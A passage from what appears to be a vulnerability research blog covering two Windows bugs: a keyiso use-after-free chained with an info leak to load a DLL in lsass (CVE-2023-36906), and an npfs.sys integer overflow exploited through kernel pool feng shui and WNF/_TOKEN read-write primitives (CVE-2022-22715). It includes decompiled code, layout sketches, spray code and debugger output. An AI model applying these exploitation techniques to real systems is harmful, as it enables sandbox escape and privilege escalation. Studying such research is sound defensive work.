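In the normal order the first decrement sees 2, so nothing is freed before the virtual call. In the racy order the first decrement sees 1, the object is freed, the late increment brings the count back to 1, and the second check passes on freed memory.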
I wrote a PoC and figured out that it may be exploitable. But as the code above shows, the vftable function is fetched through the pointer stored at offset 0x20 of the key object, which means that even if I control the freed buffer, I still need a valid address at offset 0x20 of the key object. I need an information disclosure.
Root Cause of CVE-2023-36906
Next I looked for an information disclosure. Going through the RPC interface, I found a property structure stored in the provider object; the property can be set and queried with the RPC interfaces SPCryptSetProviderProperty and SPCryptGetProviderProperty.

__int64 __fastcall SPCryptSetProviderProperty(__int64 a1, const wchar_t *a2, _DWORD *a3, unsigned int a4, int a5)
{
  [...]
  if ( !wcscmp_0(a2, L"Use Context") )
  {
    v15 = *(void **)(v8 + 32);
    if ( v15 )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v15);
    Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, v6);
    *(_QWORD *)(v8 + 32) = Heap;
    if ( !Heap )
    {
      v10 = 1450i64;
LABEL_21:
      v9 = -2146893810;
      v11 = 2148073486i64;
      goto LABEL_42;
    }
    v17 = Heap;
    goto LABEL_40;
  }
  memcpy_0(v17, a3, v6); // ============> [b]
  }
  [...]
}
__int64 __fastcall SPCryptGetProviderProperty(
        __int64 a1, const wchar_t *a2, _DWORD *a3, unsigned int a4, unsigned int *a5, int a6)
{
  [...]
  if ( !wcscmp_0(a2, L"Use Context") )
  {
    v17 = *(_QWORD *)(v10 + 32);
    v15 = 21;
    if ( !v17 )
      goto LABEL_31;
    do
      ++v13;
    while ( *(_WORD *)(v17 + 2 * v13) ); // =============> [c]
    v16 = 2 * v13 + 2;
    if ( 2 * (_DWORD)v13 == -2 )
    {
LABEL_31:
      v11 = 517i64;
LABEL_32:
      v9 = -2146893807;
      v12 = 2148073489i64;
      goto LABEL_57;
    }
    v25 = *(const void **)(v10 + 32);
    memcpy_0(a3, v25, v16); // ============> [d]
  }
  [...]
}

The client can specify which property to set. If the property is named "Use Context", the service allocates a new buffer whose size is controlled by the client, stores the pointer in the provider object, and copies the client data into it [b]. But when I reviewed the query code, I noticed that "Use Context" is treated as a string: the code walks the buffer in a while loop until it meets a null character [c], then returns the whole scanned range to the client [d].
This becomes an out-of-bounds read when I set the "Use Context" property to a buffer that contains no null character. In fact, this property is a good object for exploitation because the client controls both the size and the content of the buffer.
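The over-read can be modelled with a single array standing in for a stretch of heap: the property occupies the first few 16-bit units and an adjacent object follows it. This is a simplified sketch with hypothetical names (`scan_length`, `scan_length_bounded`); it ignores heap chunk headers, and the scan is bounded by the array size only so that the model itself stays well-defined. The bounded variant is just one way to cap the length, not the actual fix.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Scan the way the query path does: count 16-bit units until a zero
 * unit is found. `heap_units` only keeps this model inside its array. */
size_t scan_length(const uint16_t *heap, size_t start, size_t heap_units) {
    size_t n = 0;
    while (start + n < heap_units && heap[start + n] != 0)
        n++;
    return n;
}

/* Bounded variant: never report more than the property's real size. */
size_t scan_length_bounded(const uint16_t *heap, size_t start,
                           size_t heap_units, size_t prop_units) {
    size_t n = scan_length(heap, start, heap_units);
    return n < prop_units ? n : prop_units;
}
```

If a 4-unit property holds no zero unit and is followed by a pointer-like value whose top 16 bits are zero, the unbounded scan reports 7 units: the 4 property units plus the 3 non-zero units of the neighbouring pointer. The scan stops at the first zero unit, so a pointer with a zero 16-bit unit in its lower part would be leaked only partially.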
Exploitation stage
Now I have an out-of-bounds read that can leak the content of an adjacent object, and a use-after-free that can call an arbitrary address if I control the freed buffer. It's time to chain the vulnerabilities.
First, I look back at how the freed buffer is used to find out what I need:

v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))(
        *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
        *((_QWORD *)freebuffer + 5));

If I control the freed buffer and have a useful address, I can store that address at offset 0x20 of the freed buffer. Two locations relative to that address matter: offset 0x80 must hold a valid function address, and offset 0x118 must hold a pointer to another buffer.
The lsass process enables the XFG mitigation, so I can't use ROP in this exploit. But since I control the first parameter of the function, I can use LoadLibraryW to load a DLL from a controlled path. So the goal is to put the LoadLibraryW address at offset 0x80 of the valid address and the address of the payload DLL path at offset 0x118.
As I introduced in the previous section, the "Use Context" property is a good primitive because I control its size and whole content, and I have an out-of-bounds read. So the question is: which object should be adjacent to my property buffer?
I reviewed all the objects in keyiso and found that the memory buffer object may be a useful target.
v7 = SrvLookupAndReferenceProvider(hContext, hProvider, 0);
[...]
_InterlockedIncrement((volatile signed __int32 *)(v7 + 8));
*(_QWORD *)Heap = v7; // ===========> [a]
*((_QWORD *)Heap + 1) = v32;
SrvAddMemoryBufferToList((__int64)hContext, (__int64)Heap);
v26 = *((_QWORD *)Heap + 4);
Heap = 0i64;
*v15 = v26;

When a memory buffer object is created, keyiso looks up the provider object and stores its address at offset 0x0 of the memory buffer object [a]. So if I fill the property buffer with non-zero values and then query the property, the read runs into the adjacent memory buffer object and leaks the provider object address.
And since different objects have different sizes, I don't need to worry about other object types disturbing the layout during heap feng shui.
Finally, I figure out the exploitation scenario as following:
- Spray the provider object and memory buffer object. Provider object is for the finaly stage of explointation, and memory buffer is for leak the provider object.
- Free some memory buffer objects to make a heap hole, then allocate property with the same size of memory buffer object, it will occupy one of the freed holes, and then query the property to get the provider object address.
- Free enough provider objects to make sure the leaked provider object is freed, and spray the properties with the same size of provider object to occupy the leaked provider object address. The LoadlibraryW address and payload dll should be stored in the offset 0x80 and offset 0x118 in the fake provider object. But I only have one leaked address, I could set the payload dll path in another offset in property buffer, and set the address in the offset 0x118 of property buffer.
- Finally, I could trigger use after free with mutiple three diffrent threads, Thread A is for allocating the key object, Thread B is for releasing the key object, Thread C is for allocating the property object with the same size of key object, and set the fake reference count and leaked property address in offset 0x20 of property buffer.
When client win the race which means the property object occupy the key object hole after key object freed at SrvFreeKey function, it will finally load arbitrary dll in lsass process which finally cause appcontainer sandbox escape.
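To make the layout concrete, here is a minimal user-mode sketch of the two fake buffers and of the pointer chasing done by the vulnerable call site. It is a simulation under stated assumptions, not the actual exploit: the offsets 0x20, 0x28, 0x80 and 0x118 come from the decompiled call above, while `PROV_OFF_PATH`, `fake_load_library` and the helper names are hypothetical, a narrow string stands in for the wide DLL path, and the fake reference count is not modeled.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Offsets taken from the decompiled call site. */
#define KEY_OFF_PROVIDER 0x20   /* *((_QWORD *)freebuffer + 4) */
#define KEY_OFF_ARG2     0x28   /* *((_QWORD *)freebuffer + 5) */
#define PROV_OFF_FUNC    0x80   /* function pointer that gets called */
#define PROV_OFF_ARG1    0x118  /* pointer passed as the first argument */
/* Hypothetical choice: any unused offset inside the fake provider would do. */
#define PROV_OFF_PATH    0x140

typedef int64_t (*call_t)(uint64_t, uint64_t);

static void put64(uint8_t *buf, size_t off, uint64_t v)
{
    memcpy(buf + off, &v, sizeof v);
}

static uint64_t get64(const uint8_t *buf, size_t off)
{
    uint64_t v;
    memcpy(&v, buf + off, sizeof v);
    return v;
}

/* Stand-in for LoadLibraryW: it only records the path it was handed. */
static const char *g_loaded_path;

static int64_t fake_load_library(uint64_t path, uint64_t ignored)
{
    (void)ignored;
    g_loaded_path = (const char *)(uintptr_t)path;
    return 1;
}

/* Contents of the property that reclaims the freed provider object. */
static void build_fake_provider(uint8_t *prov, size_t size, call_t target,
                                const char *dll_path)
{
    assert(size >= PROV_OFF_PATH + strlen(dll_path) + 1);
    memset(prov, 0x41, size);
    memcpy(prov + PROV_OFF_PATH, dll_path, strlen(dll_path) + 1);
    put64(prov, PROV_OFF_FUNC, (uint64_t)(uintptr_t)target);
    /* Only one address is known, so the path lives in the same buffer. */
    put64(prov, PROV_OFF_ARG1, (uint64_t)(uintptr_t)(prov + PROV_OFF_PATH));
}

/* Contents of the property that reclaims the freed key object. */
static void build_fake_key(uint8_t *key, size_t size,
                           const uint8_t *leaked_provider)
{
    assert(size >= KEY_OFF_ARG2 + sizeof(uint64_t));
    memset(key, 0, size);
    put64(key, KEY_OFF_PROVIDER, (uint64_t)(uintptr_t)leaked_provider);
}

/* Same dereference chain as the vulnerable call. */
static int64_t dispatch(const uint8_t *key)
{
    const uint8_t *prov = (const uint8_t *)(uintptr_t)get64(key, KEY_OFF_PROVIDER);
    call_t fn = (call_t)(uintptr_t)get64(prov, PROV_OFF_FUNC);
    return fn(get64(prov, PROV_OFF_ARG1), get64(key, KEY_OFF_ARG2));
}
```

Calling `build_fake_provider` on a 0x200-byte buffer, `build_fake_key` on a second buffer that points at it, and then `dispatch` on the key buffer ends up in `fake_load_library` with the embedded path as its first argument, which is the shape of the real call into LoadLibraryW.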
Patch
Microsoft patched the issue by extending the lock so that it covers the code between key object initialization and release.
Before:
[...]
RtlLeaveCriticalSection(v5);
if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 )
{
  v17 = SrvFreeKey((PVOID)freebuffer);
  if ( v17 < 0 )
    DebugTraceError(
      (unsigned int)v17,
      "Status",
      "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
      700i64);
}
if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 )
{
  v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))(
          *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64),
          *((_QWORD *)freebuffer + 5));
[...]
After:
[...]
RtlEnterCriticalSection(v8);
v12 = *((_QWORD *)v9 + 2);
if ( *(volatile signed __int64 **)(v12 + 8) != v9 + 2
  || (v13 = (volatile signed __int64 **)*((_QWORD *)v9 + 3), *v13 != v9 + 2) )
{
  __fastfail(3u);
}
*v13 = (volatile signed __int64 *)v12;
*(_QWORD *)(v12 + 8) = v13;
if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 )
{
  v14 = SrvFreeKey(v9);
  if ( v14 < 0 )
    DebugTraceError(
      (unsigned int)v14,
      "Status",
      "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c",
      705i64);
}
RtlLeaveCriticalSection(v8);
if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 )
{
  v15 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)v9 + 4) + 128i64))(
          *(_QWORD *)(*((_QWORD *)v9 + 4) + 280i64),
          *((_QWORD *)v9 + 5));
[...]
Thanks to @chompie1337, @DannyOdler and @cplearns2h4ck for the discussion. Even after the patch, there would still be a UAF once SrvFreeKey is called, because SrvFreeKey frees the key object while a reference to it is still used after the function returns. That path never seems to be reachable, though. It is odd code, and I don't know why Microsoft designed it this way, but now that the lock covers the code between key object initialization and release, the UAF race condition is fixed.
Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty Pipe
In February 2022, Microsoft patched the vulnerability I used at TianfuCup 2021 to escape the Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability had existed in the Named Pipe File System for nearly 10 years, since AppContainer was born. We called it "Windows Dirty Pipe".
In this article, I will share the root cause and exploitation of Windows Dirty Pipe. So let's start our journey.
Background
A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Many browsers and applications use named pipes for IPC between the browser process and the renderer process. AppContainer was introduced when Microsoft released Windows 8.1 as a sandbox mechanism to isolate resource access from UWP applications.
Since then, some browsers and applications, such as legacy Edge and Adobe Reader, have used AppContainer as their renderer process sandbox, and the Named Pipe File System gained some mechanisms to support AppContainer. As a result, this introduced Windows Dirty Pipe -- CVE-2022-22715.
Root Cause of Windows Dirty Pipe
The vulnerability existed in the Named Pipe File System driver, npfs.sys, and the faulty function is npfs!NpTranslateContainerLocalAlias. When we invoke NtCreateFile with a named pipe path, the request hits the IRP_MJ_CREATE major function of npfs, which is NpFsdCreate.
__int64 __fastcall NpFsdCreate(__int64 a1, _IRP *a2)
{
  [...]
  if ( RelatedFileObject )
  {
    [...]
  }
  if ( UnicodeString.Length )
  {
    if ( UnicodeString.Length == 2 && *UnicodeString.Buffer == 0x5C && !RelatedFileObject ) // ===> if open root directory
      goto LABEL_47;
  }
  else
  {
    if ( !RelatedFileObject || NamedPipeType == 0x201 )
    {
      [...]
    }
    if ( NamedPipeType == 0x206 )
    {
LABEL_47:
      *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipeRootDirectory( // ===> open root directory
                                                     (__int64)&MasterIrp,
                                                     v3,
                                                     (__int64)FileObject);
      [...]
    }
  }
  if ( ifopenflag )
  {
    if ( !RelatedFileObject )
    {
      if ( createdisposition == 1 )
      {
        *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipePrefix( // ====> open an existing named pipe directory
                                                       (__int64)v33,
                                                       v3,
                                                       FileObject,
                                                       v11,
                                                       DesiredAccess,
                                                       RequestorMode);
        [...]
      }
      if ( (unsigned int)(createdisposition - 2) <= 1 )
      {
        *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpCreateNamedPipePrefix( // ====> create a new named pipe directory
                                                       (__int64)v34,
                                                       v3,
                                                       FileObject,
                                                       (struct _SECURITY_SUBJECT_CONTEXT *)v11,
                                                       DesiredAccess,
                                                       RequestorMode,
                                                       Options_high);
        [...]
      }
    }
    goto LABEL_57;
  }
  [...]
  Status = NpTranslateAlias((__m128i *)&namedpipename, ClientToken, &v39); // =====> create a new pipe
  [...]
}
The function dispatches to different handlers depending on the parameters of NtCreateFile, such as the RootDirectory of ObjectAttributes or the CreateDisposition. If we create a new named pipe, execution reaches NpTranslateAlias.
NTSTATUS __fastcall NpTranslateAlias(UNICODE_STRING *namedpipename, void *a2, _DWORD *a3)
{
  [...]
  *(_QWORD *)&String1.Length = 0xE000Ci64;
  String1.Buffer = L"LOCAL\\";
  DestinationString = 0i64;
  *a3 = 0;
  Length = _mm_cvtsi128_si32(*(__m128i *)a1);
  String2 = *a1;
  String2.Length = Length;
  if ( Length >= 2u && *String2.Buffer == 0x5C )
  {
    Length -= 2;
    String2.MaximumLength -= 2;
    v7 = 1;
    ++String2.Buffer;
    String2.Length = Length;
  }
  else
  {
    v7 = 0;
  }
  if ( !Length )
    return 0;
  if ( a2 && Length > 0xCu )
  {
    if ( RtlPrefixUnicodeString(&String1, &String2, 1u) ) // ====> compare "LOCAL\\" and prefix of named pipe name
      return NpTranslateContainerLocalAlias(a1, a2, a3); // =====> vulnerable code
  [...]
}
The named pipe name, which we control, is passed to NpTranslateAlias. The function compares the prefix of the name with "LOCAL\"; if the name starts with "LOCAL\", execution reaches NpTranslateContainerLocalAlias. This means we can use "\Device\NamedPipe\LOCAL\xxxxx" as the named pipe name.
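The routing condition can be restated as a small portable predicate. This is only a sketch of the checks visible in the decompiled snippet (strip one leading backslash, require a client token, require more than 0xC bytes, compare the "LOCAL\" prefix case-insensitively); the elided parts of the real function may add more conditions. The `ustr` type and the function names are hypothetical, and the case folding here handles ASCII only.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Counted UTF-16 string with a byte length, loosely modeled on UNICODE_STRING. */
typedef struct {
    uint16_t        length;   /* in bytes */
    const uint16_t *buffer;
} ustr;

static ustr make_ustr(const uint16_t *chars, size_t nchars)
{
    ustr s;
    assert(nchars <= 0x7fff);   /* the byte length must fit in 16 bits */
    s.length = (uint16_t)(nchars * 2);
    s.buffer = chars;
    return s;
}

static uint16_t upcase_ascii(uint16_t c)
{
    return (c >= 'a' && c <= 'z') ? (uint16_t)(c - ('a' - 'A')) : c;
}

/* True when the name would be handed to the container alias translation. */
static bool reaches_container_alias(ustr name, bool has_client_token)
{
    static const uint16_t local[] = { 'L', 'O', 'C', 'A', 'L', '\\' };
    const uint16_t prefix_bytes = (uint16_t)sizeof local;   /* 0xC */
    size_t i;

    /* A single leading backslash is skipped before the comparison. */
    if (name.length >= 2 && name.buffer[0] == '\\') {
        name.buffer += 1;
        name.length = (uint16_t)(name.length - 2);
    }
    if (name.length == 0)
        return false;
    /* The name must be strictly longer than the prefix itself. */
    if (!has_client_token || name.length <= prefix_bytes)
        return false;
    for (i = 0; i < sizeof local / sizeof local[0]; i++) {
        if (upcase_ascii(name.buffer[i]) != local[i])
            return false;
    }
    return true;
}
```

With this model, "\LOCAL\x" and "local\p" both pass, while a bare "LOCAL\" fails the length check and any name fails when no client token is supplied.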
Finally, we hit the vulnerable function; it's time to show the root cause.
NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *namedpipename, void *a2, _DWORD *a3)
{
  [...]
  result = SeQueryInformationToken(a2, TokenIsAppContainer, &TokenInformation);
  if ( result >= 0 )
  {
    result = SeQueryInformationToken(a2, TokenIsRestricted|TokenGroups, &v28);
    if ( result >= 0 )
    {
      if ( !TokenInformation && !v28 ) // =====> token must be appcontainer or restricted
        return 0;
      [...]
      v14 = *namedpipename;
      *(_QWORD *)&v30 = *(_QWORD *)&namedpipename->Length;
      v15 = v30;
      v16 = (_WORD *)_mm_srli_si128((__m128i)v14, 8).m128i_u64[0];
      v17 = v16;
      *((_QWORD *)&v30 + 1) = v16;
      if ( *v16 == '\\' )
      {
        v17 = v16 + 1;
        ifslash = 1; // ====> if the named pipe name starts with "\\", ifslash is set to 1
        v15 = v30 - 2;
      }
      else
      {
        ifslash = 0;
      }
      [...]
      // ====> calculate the new prefix length
      v21 = prefixlength + namedpipenamelength + 0x14;
      v26.MaximumLength = v21;
      if ( ifslash )
      {
        v21 += 2; // ===> v21 is a ushort, so the addition can wrap it to 0
        v26.MaximumLength = v21;
      }
      PoolWithTag = (WCHAR *)ExAllocatePoolWithTag(PagedPool, v21, 0x6E46704Eu); // ====> v21 is 0 because of the integer overflow, so a small pool is allocated
      v26.Buffer = PoolWithTag;
      if ( PoolWithTag )
      {
        if ( ifslash )
        {
          v26.Buffer = PoolWithTag + 1;
          v26.MaximumLength -= 2; // ====> if ifslash is 1, 0 minus 2 underflows and the length becomes 0xfffe
        }
        [...]
        RtlUnicodeStringPrintf( // ====> copies up to 0xfffe bytes into the small pool, causing an out-of-bounds write
          &v26,
          L"Sessions\\%ld\\AppContainerNamedObjects\\%wZ\\%wZ\\%wZ",
          (unsigned int)v32,
          &v35,
          &DestinationString,
          &v30);
        [...]
      }
  [...]
}
First, npfs checks whether the process token is an AppContainer token or a restricted token. At least one of the two conditions must hold, which means the process must be an AppContainer process, a restricted sandboxed process, or both. Then the function checks whether the first wchar of the named pipe name is "\"; if so, npfs sets the variable |ifslash| to 1.
After that, it calculates the length of the new named pipe prefix, which includes the SID, the session number, some fixed strings, and so on. The total size is the new prefix length plus the named pipe name length plus 0x14, and if |ifslash| is 1, another 2 is added.
Note that all of these variables are of type ushort, so there is an obvious integer overflow: if we use a long named pipe name, the total size wraps around to a small value.
After the calculation, npfs allocates a small pool because of the small total size. Then, if |ifslash| is 1, 2 is subtracted from the total size; if the total size is 0, this is an integer underflow, and the MaximumLength of the unicode string becomes the large ushort value 0xfffe.
RtlUnicodeStringPrintf then copies a string into the new pool buffer. The copy length depends on the MaximumLength of the unicode string, so once the integer underflow has been triggered, npfs copies a large amount of data into a small pool, which is an out-of-bounds write.
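The wrap-around is easy to check with plain 16-bit arithmetic. The sketch below models only the size computation described above; `alias_sizes`, `compute_alias_sizes` and `name_len_for_zero_alloc` are hypothetical names, `name_len` is assumed to be the name length in bytes without the leading backslash, and the prefix length used in the usage note is made up, since the real value depends on the SID and session number.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint16_t alloc_size;       /* size handed to the pool allocator */
    uint16_t maximum_length;   /* MaximumLength of the destination string */
} alias_sizes;

/* Mirrors the ushort arithmetic: prefix + name + 0x14, plus 2 with a slash. */
static alias_sizes compute_alias_sizes(uint16_t prefix_len, uint16_t name_len,
                                       int has_slash)
{
    alias_sizes s;
    uint16_t total = (uint16_t)(prefix_len + name_len + 0x14);

    if (has_slash)
        total = (uint16_t)(total + 2);          /* may wrap to 0 */
    s.alloc_size = total;
    /* With a slash, the buffer is advanced by one WCHAR and 2 is subtracted. */
    s.maximum_length = has_slash ? (uint16_t)(total - 2) : total;
    return s;
}

/* Name length in bytes that makes the allocation size wrap to exactly 0. */
static uint16_t name_len_for_zero_alloc(uint16_t prefix_len, int has_slash)
{
    uint16_t fixed = (uint16_t)(prefix_len + 0x14 + (has_slash ? 2 : 0));

    assert(fixed != 0);                         /* otherwise nothing wraps */
    return (uint16_t)(0x10000u - fixed);
}
```

For an assumed prefix length of 0x80 and a leading backslash, the required name length comes out as 0xFF6A bytes, giving an allocation size of 0 and a MaximumLength of 0xFFFE. Making the name one WCHAR longer yields an allocation size of 2 and a MaximumLength of 0, so nothing overflows the buffer.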
Crash Dump:
rax=0000000000000000 rbx=ffffe7862a687118 rcx=ffffe7862a687080
rdx=4141414141414141 rsi=4141414141414141 rdi=ffffe7862a6876d0
rip=fffff80313807bc8 rsp=ffffe40ab22d8420 rbp=ffffe7862a4e6820
 r8=ffffe40ab22d8470  r9=000001c7aa2763c0 r10=fffff80313807ac0
r11=ffffe7862a687080 r12=0000000000000001 r13=0000000000000001
r14=ffffe78628cbc060 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050246
nt!ExAcquirePushLockExclusiveEx+0x108:
fffff803`13807bc8 f0480fba2e00 lock bts qword ptr [rsi],0 ds:002b:41414141`41414141=????????????????
The crash dump shows that the out-of-bounds write corrupts other objects located after the 0x20 pool.
The purpose of NpTranslateContainerLocalAlias is to translate a named pipe name that contains "LOCAL\" into a new named pipe name. For example, if the process is an AppContainer sandboxed process, the function translates the named pipe name into a formatted string containing "AppContainerNamedObjects". AppContainerNamedObjects is a directory in the object manager that stores AppContainer-related objects, and npfs finally creates the new named pipe object under it.
But all the size variables are of type ushort; this is the root cause of Windows Dirty Pipe.
Challenges of Windows Dirty Pipe
Having introduced the root cause of Windows Dirty Pipe, I want to share the challenges of CVE-2022-22715 before I present my exploit.
When I triggered the crash and confirmed the vulnerability, I quickly realized that it is not easy to exploit. There are some challenges I had to face:
- Although the integer overflow in the total size calculation can produce any small value, such as 0x20, 0x30 or 0x40, the total size must be exactly 0, because we need the integer underflow to turn the MaximumLength of the unicode string into a large ushort value for the out-of-bounds write. If the total size is larger than 0, subtracting 2 still leaves a small value and no out-of-bounds write is triggered.
- As I said above, the copy length is 0xfffe, which means I write about 16 pages of data into a paged pool segment. It is not easy to build a stable layout for that.
The first step of my exploitation was to find a way to do pool feng shui. In this situation, the corrupted pool must be a 0x20 paged pool, which is served by the kernel low fragmentation heap (LFH). At first, I wanted to spray 0x20 LFH pools and corrupt some 0x20 object to complete the exploitation.
But the problem is that I can't precisely control the position of the vulnerable 0x20 pool within the LFH bucket, and the copy length is 0xfffe, so the write may corrupt unexpected objects or protected pages and cause a BSoD.
I don't want to go deep into kernel pool allocation in this post; there are many excellent articles and slides about it. Let me just share an interesting kernel pool allocation mechanism I used to solve the problem.
As we all know, the Windows kernel allocates pool segments through the backend allocator and subsegments through the frontend allocator, and an interesting mechanism is that different types of subsegments can be allocated in the same segment.
That got my attention!
After some tests, I confirmed that I can make a 0x20 LFH subsegment and a VS subsegment adjacent. This gives me my pool feng shui layout.
Stage 1: Preparation
Because the vulnerable pool is a paged pool, I chose WNF as my limited r/w primitive. I use _WNF_STATE_DATA as a limited out-of-bounds read/write object, the manager object; the maximum read/write range of _WNF_STATE_DATA is 0x1000. I also need another object to achieve arbitrary address read/write, the worker object. It's actually not difficult to find a suitable one: it must be a paged pool object containing a pointer field that can be used to read or write an arbitrary address, for example through memcpy.
I finally decided to use the _TOKEN object as the worker object. If I invoke NtSetInformationToken with the TokenDefaultDacl TokenInformationClass, nt eventually invokes nt!SepAppendDefaultDacl, which copies user-controlled content to a pointer field stored in the _TOKEN object.
void *__fastcall SepAppendDefaultDacl(_TOKEN *TOKEN, unsigned __int16 *usercontrolled)
{
  v3 = usercontrolled[1];
  v4 = (_ACL *)&TOKEN->DynamicPart[*((unsigned __int8 *)a1->PrimaryGroup + 1) + 2];
  result = memmove(v4, usercontrolled, usercontrolled[1]);
  [...]
}
And if I invoke NtQueryInformationToken with the TokenBnoIsolation TokenInformationClass, nt copies the IsolationPrefix buffer to user-mode memory.
NTSTATUS __stdcall NtQueryInformationToken(
        HANDLE TokenHandle,
        TOKEN_INFORMATION_CLASS TokenInformationClass,
        PVOID TokenInformation,
        ULONG TokenInformationLength,
        PULONG ReturnLength)
{
  [...]
    case TokenBnoIsolation:
      [...]
      memmove(
        (char *)TokenInformation + 16,
        TOKEN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer,
        TOKEN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength);
    }
  [...]
}
So I can use the manager object to write a fake _TOKEN structure over the adjacent worker object, then use NtSetInformationToken and NtQueryInformationToken as an arbitrary r/w primitive.
Another object I need to prepare is the 0x20 spray object, whose allocation and release I must fully control. I found a function named nt!NtRegisterThreadTerminatePort.
NTSTATUS __fastcall NtRegisterThreadTerminatePort(void *a1)
{
  CurrentThread = KeGetCurrentThread();
  Object = 0i64;
  result = ObReferenceObjectByHandle(a1, 1u, LpcPortObjectType, CurrentThread->PreviousMode, &Object, 0i64);
  if ( result >= 0 )
  {
    PoolWithQuotaTag = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, 0x10ui64, 0x70547350u);
    v4 = PoolWithQuotaTag;
    if ( PoolWithQuotaTag )
    {
      PoolWithQuotaTag[1] = Object;
      *PoolWithQuotaTag = CurrentThread[1].InitialStack;
      result = 0;
      CurrentThread[1].InitialStack = v4;
    }
    else
    {
      ObfDereferenceObject(Object);
      return -1073741670;
    }
  }
  return result;
}
The function references an LpcPort object and allocates a 0x20 paged pool that stores the LpcPort object pointer, then links it into the _ETHREAD object. If we create a thread and invoke NtRegisterThreadTerminatePort many times in it, we can allocate a large number of 0x20 paged pools.
Finally, I had a pool feng shui plan in my head:
- Spray 0x20 paged pools to fill the LFH subsegments. Once every segment is full, the backend allocator allocates a new segment, and our new 0x20 LFH subsegment is located in that new segment.
- Spray _TOKEN objects and _WNF_STATE_DATA objects to fill the VS subsegments, making sure they land in the same page. The frontend allocator eventually allocates a new VS subsegment, which is located in the segment created in step 1, adjacent to the LFH subsegment.
So our final pool feng shui looks like the following:
Note that I can't predict the position of the vulnerable pool in the LFH bucket, but I don't actually care. In this pool feng shui, the goal of the out-of-bounds write is to overwrite the manager object and the worker object in the VS subsegment, so I don't need to make a pool hole for the vulnerable object; I just fill the LFH bucket with spray objects and make sure the vulnerable object is located at the end of the LFH bucket.
Stage 2: Pool feng shui
When spraying WNF objects, I found that another object named _WNF_NAME_INSTANCES is also created, which causes the frontend allocator to create another LFH segment and affects our pool feng shui layout.
So before doing the pool feng shui, I create a lot of 0xd0 pools and free them, leaving a large number of 0xd0 pool holes to hold the _WNF_NAME_INSTANCES objects.
for (UINT i = 0x0; i < 0x4000; i++) { //0xf000 for normal pool hole
    AllocateWnfObject(0xd0, &gStateName[i]);
}
for (UINT i = 0x0; i < 0x4000; i++) { //0xf000
    fNtDeleteWnfStateName(&gStateName[i]); //0x30
}
I allocate a large number of spray objects, then spray _TOKEN objects and _WNF_STATE_DATA objects; this creates a new LFH subsegment and a new VS subsegment in the new segment. We can observe the final pool feng shui layout in WinDbg.
0: kd> !pool ffffb0880d69e000
Pool page ffffb0880d69e000 region is Paged pool
*ffffb0880d69e000 size: 20 previous size: 0 (Allocated) *PsTp Process: ffffc10b74a1c080
        Pooltag PsTp : Thread termination port block, Binary : nt!ps
 ffffb0880d69e020 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e040 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e060 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e080 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
 ffffb0880d69e0a0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
0: kd> !pool ffffb0880d69f000
Pool page ffffb0880d69f000 region is Paged pool
*ffffb0880d69f000 size: 20 previous size: 0 (Free) *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d69f020 size: 20 previous size: 0 (Free) ....
 ffffb0880d69f040 size: 20 previous size: 0 (Free) ....
 ffffb0880d69f060 size: 20 previous size: 0 (Free) ....
 ffffb0880d69f080 size: 20 previous size: 0 (Free) ....
 ffffb0880d69f0a0 size: 20 previous size: 0 (Free) ....
0: kd> !pool ffffb0880d6a0000
Pool page ffffb0880d6a0000 region is Paged pool
*ffffb0880d6a0000 size: 20 previous size: 0 (Free) *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a0020 size: 20 previous size: 0 (Free) ....
 ffffb0880d6a0040 size: 20 previous size: 0 (Free) ....
 ffffb0880d6a0060 size: 20 previous size: 0 (Free) ....
 ffffb0880d6a0080 size: 20 previous size: 0 (Free) ....
0: kd> !pool ffffb0880d6a1000
Pool page ffffb0880d6a1000 region is Paged pool
*ffffb0880d6a1000 size: 20 previous size: 0 (Free) *....
        Owning component : Unknown (update pooltag.txt)
 ffffb0880d6a1020 size: 20 previous size: 0 (Free) ....
 ffffb0880d6a1040 size: 20 previous size: 0 (Free) ....
 ffffb0880d6a1060 size: 20 previous size: 0 (Free) ....
 ffffb0880d6a1080 size: 20 previous size: 0 (Free) ....
